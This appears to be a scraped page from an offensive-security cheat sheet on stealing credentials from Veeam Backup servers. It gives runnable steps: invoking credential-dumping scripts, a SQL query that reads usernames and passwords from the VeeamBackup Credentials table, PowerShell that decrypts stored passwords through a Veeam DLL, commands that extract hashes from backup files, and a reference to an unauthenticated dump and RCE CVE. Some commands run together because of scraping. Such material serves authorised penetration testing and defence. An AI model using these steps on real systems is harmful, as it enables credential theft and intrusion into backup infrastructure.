Veeam Backup
MITRE ATT&CK™ Credential Access - Tactic TA0006
Theory
Practice
Credentials Dump
.\Veeam-Get-Creds.ps1python3 veampot.pySELECT TOP (1000) [id]
,[user_name]
,[password]
,[usn]
,[description]
,[visible]
,[change_time_utc]
FROM [VeeamBackup].[dbo].[Credentials] Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll"
$encoded = 'INSERT_HASH_HERE'
[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded) Backup Machines - Hashes Extraction
#Before, copy backups files in the current directory
#VBK Extract on linux
tar -zxvf VeamExtract*
./extract
Unauthenticated Credentials Dump & RCE - CVE-2023-27532
References
Last updated